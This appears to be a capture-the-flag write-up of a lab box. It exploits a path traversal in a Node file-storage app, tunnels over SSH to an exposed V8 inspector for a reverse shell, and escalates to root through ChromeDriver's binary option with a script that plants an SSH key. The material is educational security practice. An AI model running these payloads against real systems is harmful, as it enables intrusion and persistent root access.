client.connect( { host, username, password });

// index

router.get('/', (req, res) => {

res.render('index', { title: 'Secure Encrypted Storage - 01001101 01101001 01101100 01101001 01110100 01100001 01110010 01111001 00100000 01000111 01110010 01100001 01100100 01100101' });

});

// list files on sftp

router.get('/list', async function (req, res) {

var fileNames = await client.listFiles("files");

res.render('list', { title: 'Secure Encrypted Storage - List', fileNames: fileNames });

});

// upload file to temp folder, move encrypted into sftp & remove temp file

router.get('/upload', async function (req, res) {

res.render('upload', { title: 'Secure Encrypted Storage - Upload' });

});

router.post('/upload', upload.single('imageupload'), async function (req, res) {

const name = req.file.filename;

const filePath = `${process.env.STORE_HOME}/public/tmp/${name}`;

// Todo: Use unique keys for each user

await xorFileContents(filePath, process.env.SECRET, inplace=true);

await client.uploadFile(filePath, `files/${name}`);

// Todo: Remove unencrypted files from uploads dir

res.send(`

<script>

setTimeout(function() {

window.location.href = '/';

}, 1000);

</script>

File upload successfully.

`);

});

// get content of a specific file

router.get('/file/:file', async function (req, res) {

const name = req.params.file;

const filePath = `${process.env.STORE_HOME}/public/tmp/${name}`;

if (path.normalize(filePath) == filePath) {

await client.downloadFile(`files/${name}`, filePath);

}

const data = await xorFileContents(filePath, process.env.SECRET, inplace=false);

res.render('file', { title: 'Secure Encrypted Storage - Data', data: data, b64data: Buffer.from(data).toString('base64') });

});

// get content of specific file directly

router.post('/file', async function (req, res) {

const name = req.body.file;

const filePath = `${process.env.STORE_HOME}/public/tmp/${name}`;

// Only store files into valid paths!

console.log(filePath);

console.log(path.normalize(filePath));

if (path.normalize(filePath) == filePath) {

await client.downloadFile(`files/${name}`, filePath);

}

const data = await xorFileContents(filePath, process.env.SECRET, inplace=false);

res.send(data);

});

module.exports = router;

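Uploads are written by multer to ${process.env.STORE_HOME}/public/tmp/, where they are XOR encrypted in place and then uploaded to SFTP. There’s a “todo” comment about cleaning up this directory, which is why the encrypted copies are still reachable at /tmp. The /file/:file route only downloads from SFTP when path.normalize(filePath) matches filePath. With a traversal payload the check fails and the download is skipped, but xorFileContents still reads whatever filePath points to, which is what gives the file read.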
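To see how the normalize check behaves for a benign name versus a traversal payload, here’s a rough Python model of it. I’m using `posixpath.normpath` as a stand-in for Node’s `path.normalize`; the two differ in some edge cases (trailing slashes, for example), so treat this as an approximation. The `resolve` helper is hypothetical.

```python
import posixpath

STORE_HOME = "/home/dev/projects/store1"  # value from the .env file


def resolve(name: str) -> tuple[str, bool]:
    """Return the path that ends up being read and whether the SFTP download would run."""
    file_path = f"{STORE_HOME}/public/tmp/{name}"
    normalized = posixpath.normpath(file_path)
    # The route only calls downloadFile when the normalized path is unchanged.
    return normalized, normalized == file_path


benign = resolve("test.txt")
traversal = resolve("../../../../../../etc/passwd")
print(benign)
print(traversal)
```

Six `..` segments are enough here because the upload directory sits six levels below the filesystem root, which lines up with the payload in my file read script.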

Validate Creds

SFTP runs over SSH, so I can check the creds there:

oxdf@hacky$ netexec ssh 10.129.31.17 -u sftpuser -p WidK52pWBtWQdcVC

SSH 10.129.31.17 22 10.129.31.17 SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13

SSH 10.129.31.17 22 10.129.31.17 [+] sftpuser:WidK52pWBtWQdcVC Linux - Shell access!

They work! Unfortunately, netexec doesn’t check if I can actually get a shell. I can’t:

oxdf@hacky$ sshpass -p WidK52pWBtWQdcVC ssh sftpuser@10.129.31.17

This service allows sftp connections only.

Connection to 10.129.31.17 closed.

Shell as dev

Tunnel

SFTP

I can connect to SFTP:

oxdf@hacky$ sftp sftpuser@10.129.31.17

Warning: Permanently added '10.129.31.17' (ED25519) to the list of known hosts.

(sftpuser@10.129.31.17) Password:

Connected to 10.129.31.17.

sftp> ls

files

sftp> ls files

files/0xdf.png files/ejs_test.txt files/file_on_5000.txt files/file_on_5001.txt

files/file_on_5002.txt files/known_plaintext.txt files/port_test.txt files/pwned.txt

files/shell.php files/ssti_test.txt files/test.txt

All the files are there in the files directory. I suspect if this were a shared box, I could see other people’s uploads here as well, as they are all owned by sftpuser (UID 1002):

oxdf@hacky$ sshpass -p WidK52pWBtWQdcVC sftp sftpuser@10.129.31.17

Connected to 10.129.31.17.

sftp> ls -la files

drwxr-xr-x 2 1002 1002 4096 Oct 29 11:07 .

drwxr-xr-x 3 root root 4096 Feb 13 2023 ..

-rw-rw-rw- 1 1002 1002 49946 Oct 29 02:33 0xdf.png

-rw-rw-rw- 1 1002 1002 11 Oct 29 02:36 ejs_test.txt

-rw-rw-rw- 1 1002 1002 5 Oct 29 02:43 file_on_5000.txt

-rw-rw-rw- 1 1002 1002 5 Oct 29 02:43 file_on_5001.txt

-rw-rw-rw- 1 1002 1002 5 Oct 29 02:43 file_on_5002.txt

-rw-rw-rw- 1 1002 1002 17 Oct 29 11:07 known_plaintext.txt

-rw-rw-rw- 1 1002 1002 15 Oct 29 02:43 port_test.txt

-rw-rw-rw- 1 1002 1002 5 Oct 29 02:37 pwned.txt

-rw-rw-rw- 1 1002 1002 31 Oct 29 02:37 shell.php

-rw-rw-rw- 1 1002 1002 8 Oct 29 02:36 ssti_test.txt

-rw-rw-rw- 1 1002 1002 15 Oct 29 11:11 test.txt

Still, this isn’t interesting as I already have access to those files via the site, and VulnLab boxes were designed for individual instances.

SSH Config

I’ll read /etc/ssh/sshd_config:

/etc/ssh/sshd_config

# This is the sshd server system-wide configuration file. See

# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

# The strategy used for options in the default sshd_config shipped with

# OpenSSH is to specify options with their default value where

# possible, but leave them commented. Uncommented options override the

# default value.

Include /etc/ssh/sshd_config.d/*.conf

#Port 22

#AddressFamily any

#ListenAddress 0.0.0.0

#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key

#HostKey /etc/ssh/ssh_host_ecdsa_key

#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying

#RekeyLimit default none

# Logging

#SyslogFacility AUTH

#LogLevel INFO

# Authentication:

#LoginGraceTime 2m

PermitRootLogin yes

#StrictModes yes

#MaxAuthTries 6

#MaxSessions 10

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.

#AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none

#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts

#HostbasedAuthentication no

# Change to yes if you don't trust ~/.ssh/known_hosts for

# HostbasedAuthentication

#IgnoreUserKnownHosts no

# Don't read the user's ~/.rhosts and ~/.shosts files

#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!

PasswordAuthentication yes

#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with

# some PAM modules and threads)

KbdInteractiveAuthentication yes

# Kerberos options

#KerberosAuthentication no

#KerberosOrLocalPasswd yes

#KerberosTicketCleanup yes

#KerberosGetAFSToken no

# GSSAPI options

#GSSAPIAuthentication no

#GSSAPICleanupCredentials yes

#GSSAPIStrictAcceptorCheck yes

#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,

# and session processing. If this is enabled, PAM authentication will

# be allowed through the KbdInteractiveAuthentication and

# PasswordAuthentication. Depending on your PAM configuration,

# PAM authentication via KbdInteractiveAuthentication may bypass

# the setting of "PermitRootLogin without-password".

# If you just want the PAM account and session checks to run without

# PAM authentication, then enable this but set PasswordAuthentication

# and KbdInteractiveAuthentication to 'no'.

UsePAM yes

#AllowAgentForwarding yes

#AllowTcpForwarding yes

#GatewayPorts no

X11Forwarding yes

#X11DisplayOffset 10

#X11UseLocalhost yes

#PermitTTY yes

PrintMotd no

#PrintLastLog yes

#TCPKeepAlive yes

#PermitUserEnvironment no

#Compression delayed

#ClientAliveInterval 0

#ClientAliveCountMax 3

#UseDNS no

#PidFile /run/sshd.pid

#MaxStartups 10:30:100

#PermitTunnel no

#ChrootDirectory none

#VersionAddendum none

# no default banner path

#Banner none

# Allow client to pass locale environment variables

AcceptEnv LANG LC_*

# override default of no subsystems

Subsystem sftp /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis

#Match User anoncvs

# X11Forwarding no

# AllowTcpForwarding no

# PermitTTY no

# ForceCommand cvs server

Match User sftpuser

ForceCommand internal-sftp

PasswordAuthentication yes

ChrootDirectory /var/sftp

AllowAgentForwarding no

X11Forwarding no

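There’s a lot here, most of which is default. At the end, a Match block defines the config for sftpuser. ForceCommand internal-sftp restricts sessions to SFTP, but the block never sets AllowTcpForwarding no, so the default of yes (shown in the commented-out #AllowTcpForwarding yes line above) still applies.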
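Spotting a missing directive by eye is easy to get wrong in a long config, so here’s a simplified sketch that collects what a Match block sets. It only handles a plain `Match User <name>` line and ignores includes and other match criteria; `match_block_options` is my own helper, not part of any SSH tooling.

```python
def match_block_options(config: str, user: str) -> dict[str, str]:
    """Collect directives set inside the 'Match User <user>' block."""
    options = {}
    in_block = False
    for line in config.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = stripped.split(None, 1)
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":
            # A new Match line ends the previous block.
            in_block = value.split() == ["User", user]
            continue
        if in_block:
            options[keyword] = value
    return options


# The Match block from the end of the config above.
sample = """\
Match User sftpuser
ForceCommand internal-sftp
PasswordAuthentication yes
ChrootDirectory /var/sftp
AllowAgentForwarding no
X11Forwarding no
"""

opts = match_block_options(sample, "sftpuser")
forwarding = opts.get("allowtcpforwarding", "yes (sshd default)")
print(forwarding)
```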

Create Tunnel

While the SFTP user isn’t allowed to run commands over SSH, they can still connect, and it’s possible to tunnel. I’ll use -N to tell ssh not to run a remote command, but just connect and hold until killed:

oxdf@hacky$ sshpass -p WidK52pWBtWQdcVC ssh sftpuser@10.129.31.17 -N -L 9229:127.0.0.1:9229

This just hangs. On my host, 9229 is listening:

oxdf@hacky$ sudo netstat -tnlp | grep 9229

tcp 0 0 127.0.0.1:9229 0.0.0.0:* LISTEN 112211/ssh

tcp6 0 0 ::1:9229 :::* LISTEN 112211/ssh
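The same check can be scripted. This is a minimal sketch (`port_open` is a name I chose) that just tries a TCP connection. Note that it only shows the local ssh listener is accepting connections; it doesn’t prove the far end of the forward is reachable.

```python
import socket


def port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


# With the tunnel up, I'd expect this to report True on my host:
# print(port_open("127.0.0.1", 9229))
```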



node Inspect

Connect Inspector

The webserver is running with the command line node --inspect=127.0.0.1:9229 /home/dev/projects/store1/start.js. The --inspect flag means that the V8 Inspector is running and listening on that NIC/port, allowing debugging of the JS application.
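The inspector also answers plain HTTP on the same port, with `/json/list` returning the debuggable targets and their WebSocket URLs. Here’s a hedged Python sketch of reading that list through the tunnel. The helper names are mine, and `SAMPLE_TARGETS` is a made-up response shaped like what Node returns (the id is a placeholder, not one from this box).

```python
import json
from urllib.request import urlopen


def list_targets(host: str = "127.0.0.1", port: int = 9229) -> list[dict]:
    """Fetch the inspector's target list over HTTP (needs the tunnel up)."""
    with urlopen(f"http://{host}:{port}/json/list", timeout=3) as resp:
        return json.load(resp)


def websocket_urls(targets: list[dict]) -> list[str]:
    """Pull the WebSocket debugger URL out of each target entry."""
    return [t["webSocketDebuggerUrl"] for t in targets if "webSocketDebuggerUrl" in t]


# Hypothetical response for illustration; the id is a placeholder.
SAMPLE_TARGETS = json.loads("""
[{"id": "00000000-0000-0000-0000-000000000000",
  "title": "/home/dev/projects/store1/start.js",
  "type": "node",
  "webSocketDebuggerUrl": "ws://127.0.0.1:9229/00000000-0000-0000-0000-000000000000"}]
""")

print(websocket_urls(SAMPLE_TARGETS))
```

With the tunnel connected, `websocket_urls(list_targets())` would give the URL a debugger client attaches to.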

To interact with it, I’ll open Chromium and go to chrome://inspect. Without the tunnel, it looks like this:



As soon as I connect the tunnel (without needing to refresh), it shows a remote target:

Clicking “inspect” opens a Chromium dev tools window with a limited set of tabs:



There’s a bunch of errors in the console. More importantly, I can run arbitrary JavaScript commands:



Shell

I’ll grab “node.js #2” from revshells.com and paste it into the console:

When I hit enter, there’s a connection at my listening nc:

oxdf@hacky$ nc -lnvp 443

Listening on 0.0.0.0 443

Connection received on 10.129.31.17 46876

whoami

dev

I’ll upgrade my shell using the standard trick:

script /dev/null -c bash

Script started, output log file is '/dev/null'.

dev@store:~/projects/store1$ ^Z

[1]+ Stopped nc -lnvp 443

oxdf@hacky$ stty raw -echo; fg

nc -lnvp 443

reset

reset: unknown terminal type unknown

Terminal type? screen

dev@store:~/projects/store1$

And grab user.txt:

dev@store:~$ cat user.txt

0f4a8fca************************

Shell as root

Enumeration

Home Directories

In the user’s home directory, inside projects, there are three directories:

dev@store:~/projects$ ls

store1 store2 store3

I’ll use a little bash foo to compare files in store1 and store2:

dev@store:~/projects/store2$ find . -type f | grep -v -e public/tmp | while read fn; do diff $fn ../store1/$fn || echo "$fn"; done

14c14

< "watch": "nodemon --exec 'node --inspect=127.0.0.1:9230 /home/dev/projects/store2/start.js'"

---

> "watch": "nodemon --exec 'node --inspect=127.0.0.1:9229 /home/dev/projects/store1/start.js'"

./package.json

3,4c3,4

< STORE_HOME=/home/dev/projects/store2

< PORT=5001

---

> STORE_HOME=/home/dev/projects/store1

> PORT=5000

./.env

The only files that are different are the package.json files and the .env files. So the sites really are the same.
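The same comparison can be sketched in Python, which avoids the quoting issues a shell loop hits with odd filenames. This is an illustration rather than what I ran on the box. `differing_files` is a hypothetical helper, and like the one-liner it skips anything under public/tmp.

```python
import filecmp
from pathlib import Path


def differing_files(left: Path, right: Path, skip: str = "public/tmp") -> list[str]:
    """Return relative paths of files under `left` that differ from, or are missing in, `right`."""
    changed = []
    for path in sorted(left.rglob("*")):
        rel = path.relative_to(left)
        if not path.is_file() or skip in rel.as_posix():
            continue
        other = right / rel
        # shallow=False compares file contents rather than just size and mtime.
        if not other.is_file() or not filecmp.cmp(path, other, shallow=False):
            changed.append(rel.as_posix())
    return changed
```

Run as `differing_files(Path("store2"), Path("store1"))`, it should report the same two files, package.json and .env.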



Chrome

In /opt there’s a Google Chrome installation:

dev@store:/$ ls opt/google/

chrome

dev@store:/$ ls opt/google/chrome/

MEIPreload chrome-sandbox cron icudtl.dat libqt5_shim.so nacl_helper product_logo_16.png product_logo_32.xpm v8_context_snapshot.bin

WidevineCdm chrome_100_percent.pak default-app-block libEGL.so libvk_swiftshader.so nacl_helper_bootstrap product_logo_24.png product_logo_48.png vk_swiftshader_icd.json

chrome chrome_200_percent.pak default_apps libGLESv2.so libvulkan.so.1 nacl_irt_x86_64.nexe product_logo_256.png product_logo_64.png xdg-mime

chrome-management-service chrome_crashpad_handler google-chrome liboptimization_guide_internal.so locales product_logo_128.png product_logo_32.png resources.pak xdg-settings

This is interesting, as on CTF machines it typically indicates some kind of automated user. chromedriver is running as root:

dev@store:/$ ps auxww | grep -i chrome

root 758 0.0 0.3 33612408 12544 ? Ssl 02:01 0:00 /root/chromedriver

The listening ports are interesting as well:

dev@store:/$ netstat -tnlp

(Not all processes could be identified, non-owned process info

will not be shown, you would have to be root to see it all.)

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 127.0.0.1:9230 0.0.0.0:* LISTEN 1021/node

tcp 0 0 127.0.0.1:9231 0.0.0.0:* LISTEN 1008/node

tcp 0 0 127.0.0.1:9229 0.0.0.0:* LISTEN 38310/node

tcp 0 0 127.0.0.1:9515 0.0.0.0:* LISTEN -

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -

tcp6 0 0 :::22 :::* LISTEN -

tcp6 0 0 :::5000 :::* LISTEN 38310/node

tcp6 0 0 :::5001 :::* LISTEN 1021/node

tcp6 0 0 :::5002 :::* LISTEN 1008/node

tcp6 0 0 ::1:9515 :::* LISTEN -



Only the processes running as dev show a PID. Of the other ports, 9515 stands out. That’s the default ChromeDriver port. Fetching it with curl returns an error with a stack trace:

dev@store:/$ curl localhost:9515

{"value":{"error":"unknown command","message":"unknown command: unknown command: ","stacktrace":"#0 0x620167153d93 \u003Cunknown>\n#1 0x620166f222d7 \u003Cunknown>\n#2 0x620166f7df2c \u003Cunknown>\n#3 0x620166f7db82 \u003Cunknown>\n#4 0x620166ef32a3 \u003Cunknown>\n#5 0x6201671a78be \u003Cunknown>\n#6 0x6201671ab8f0 \u003Cunknown>\n#7 0x62016718bf90 \u003Cunknown>\n#8 0x6201671acb7d \u003Cunknown>\n#9 0x62016717d578 \u003Cunknown>\n#10 0x620166ef16ee \u003Cunknown>\n#11 0x746bd9c29d90 \u003Cunknown>\n"}}

Claude can easily identify this:

/status will show the current status:

dev@store:/$ curl localhost:9515/status

{"value":{"build":{"version":"110.0.5481.77 (65ed616c6e8ee3fe0ad64fe83796c020644d42af-refs/branch-heads/5481@{#839})"},"message":"ChromeDriver ready for new sessions.","os":{"arch":"x86_64","name":"Linux","version":"6.8.0-1040-aws"},"ready":true}}

/sessions shows no active sessions:

dev@store:/$ curl localhost:9515/sessions

{"sessionId":"","status":0,"value":[]}

This means I can’t get into the browser and take over there like I showed in Sightless and Agile.
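Those two checks are easy to script. Here’s a rough Python sketch that summarizes the ChromeDriver state from the /status and /sessions responses. The helper names are mine, and the embedded JSON is copied from the curl output above so the parsing can be followed without access to the box.

```python
import json
from urllib.request import urlopen


def get_json(path: str, base: str = "http://localhost:9515") -> dict:
    """GET a ChromeDriver endpoint and decode the JSON body (run on the box)."""
    with urlopen(base + path, timeout=3) as resp:
        return json.load(resp)


def summarize(status: dict, sessions: dict) -> dict:
    """Reduce the /status and /sessions responses to the fields that matter here."""
    value = status["value"]
    return {
        "version": value["build"]["version"].split(" ")[0],
        "ready": value["ready"],
        "active_sessions": len(sessions["value"]),
    }


# Responses copied from the curl output above.
STATUS = json.loads(
    '{"value":{"build":{"version":"110.0.5481.77 (65ed616c6e8ee3fe0ad64fe83796c020644d42af-refs/branch-heads/5481@{#839})"},'
    '"message":"ChromeDriver ready for new sessions.",'
    '"os":{"arch":"x86_64","name":"Linux","version":"6.8.0-1040-aws"},"ready":true}}'
)
SESSIONS = json.loads('{"sessionId":"","status":0,"value":[]}')

summary = summarize(STATUS, SESSIONS)
print(summary)
```

On the target, `summarize(get_json("/status"), get_json("/sessions"))` would do the same against the live service.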

Shell



Searching for “Chrome webdriver RCE” finds this post from 404 team:

This post shows how to start a new session with a POST to /session:

It’ll be a pain to pass a full list of commands with lots of arguments, so I’ll create a simple bash script that will write my public key to root’s authorized_keys file:

dev@store:/$ echo -e '#!/bin/bash\n\nmkdir -p /root/.ssh\necho "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing" >> /root/.ssh/authorized_keys\nchmod 600 /root/.ssh/authorized_keys\nchmod 700 /root/.ssh' | tee /dev/shm/ssh.sh

#!/bin/bash

mkdir -p /root/.ssh

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing" >> /root/.ssh/authorized_keys

chmod 600 /root/.ssh/authorized_keys

chmod 700 /root/.ssh

dev@store:/$ chmod +x /dev/shm/ssh.sh

Now I’ll trigger it by asking ChromeDriver to start a new session with my script as the Chrome binary:

dev@store:/$ curl localhost:9515/session -d '{"capabilities": {"alwaysMatch": {"goog:chromeOptions": {"binary": "/dev/shm/ssh.sh"}}}}'

{"value":{"error":"unknown error","message":"unknown error: Chrome failed to start: exited normally.\n (unknown error: DevToolsActivePort file doesn't exist)\n (The process started from chrome location /dev/shm/ssh.sh is no longer running, so ChromeDriver is assuming that Chrome has crashed.)","stacktrace":"#0 0x620167153d93 \u003Cunknown>\n#1 0x620166f222d7 \u003Cunknown>\n#2 0x620166f4aab0 \u003Cunknown>\n#3 0x620166f46a3d \u003Cunknown>\n#4 0x620166f8b4f4 \u003Cunknown>\n#5 0x620166f82353 \u003Cunknown>\n#6 0x620166f51e40 \u003Cunknown>\n#7 0x620166f53038 \u003Cunknown>\n#8 0x6201671a78be \u003Cunknown>\n#9 0x6201671ab8f0 \u003Cunknown>\n#10 0x62016718bf90 \u003Cunknown>\n#11 0x6201671acb7d \u003Cunknown>\n#12 0x62016717d578 \u003Cunknown>\n#13 0x6201671d1348 \u003Cunknown>\n#14 0x6201671d14d6 \u003Cunknown>\n#15 0x6201671eb341 \u003Cunknown>\n#16 0x746bd9c94ac3 \u003Cunknown>\n"}}
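The request body is small enough to build by hand, but a Python sketch makes the structure clearer. The function names here are hypothetical. `post_session` is never called in the block, and it assumes ChromeDriver replies with an HTTP error status when the "browser" fails to start, which is why it reads the body from the exception.

```python
import json
from urllib.error import HTTPError
from urllib.request import Request, urlopen


def new_session_payload(binary: str) -> str:
    """Build the JSON body for POST /session, pointing ChromeDriver at `binary`."""
    body = {
        "capabilities": {
            "alwaysMatch": {
                # ChromeDriver executes this path as if it were Chrome.
                "goog:chromeOptions": {"binary": binary},
            }
        }
    }
    return json.dumps(body)


def post_session(payload: str, base: str = "http://localhost:9515") -> str:
    """Send the new-session request and return the response body as text."""
    req = Request(
        base + "/session",
        data=payload.encode(),
        headers={"Content-Type": "application/json"},
    )
    try:
        with urlopen(req, timeout=30) as resp:
            return resp.read().decode()
    except HTTPError as err:
        # Assumption: a failed launch comes back as an HTTP error with a JSON body.
        return err.read().decode()


payload = new_session_payload("/dev/shm/ssh.sh")
print(payload)
```

The printed payload matches the string passed to curl with -d above.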

It reports failure, because my script isn’t a valid browser. But SSH works:

oxdf@hacky$ ssh -i ~/keys/ed25519_gen root@10.129.31.17

Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.8.0-1040-aws x86_64)

...[snip]...

root@store:~#

I’ll grab root.txt:

root@store:~# cat root.txt

318627f2************************
